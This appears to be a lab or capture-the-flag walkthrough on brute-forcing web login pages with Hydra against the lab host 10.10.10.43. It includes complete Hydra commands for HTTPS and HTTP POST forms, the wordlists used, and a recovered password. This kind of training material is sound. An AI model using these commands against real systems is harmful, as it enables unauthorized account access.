Bruteforce using Hydra Link to heading
To use Hydra we need to mainly identify 4 Parameters:
<IP Address> = ""
<Login Page> = ""
<Request Body> = ""
<Error Message> =""
To identify these parameters, lets intercept the request with Burp.
Based on the intercepted values, I have filled the values for HTTPS site subdomain
= “10.10.10.43”
= “/db/index.php”
= “^PASS^&login=Log+In&proc_login=true”
=“Incorrect password.”
Now Formulate the bruteforce command using hydra. For using hydra always username is required. In this case we can give any fixed value. Remember to use “https-post-form” as its a ssl website.
-V- stands for Verbose which shows the username/password combination tried by Hydra
-s can be used to specify the port( in this case we have specified 443). This is can be ignored in this case as it works both on 80 and 443.
─$ hydra 10.10.10.43 -l rchitect -P /usr/share/SecLists-master/Passwords/twitter-banned.txt https-post-form "/db/index.php:password=^PASS^&login=Log+In&proc_login=true:Incorrect password." -V -s 443
We have a password now
Brute force for http-website ( username/passoword combination) Link to heading
Intercept the login request using Burp. The command is almost same for http website, instead of “https-post-form”, it uses “http-post-form”
Fill the 4 imp parameters
<IP Address> = "10.10.10.43"
<Login Page> = "/department/login.php"
<Request Body> = "username=admin&password=^PASS^"
<Error Message> ="Invalid Password!"
Hydra Command
└─$ hydra 10.10.10.43 -l admin -P /usr/share/wordlists/rockyou.txt http-post-form “/department/login.php:username=^USER^&password=^PASS^:Invalid Password " -V
We have password cracked now:
password: 1q2w3e4r5t
It allows to a login page below
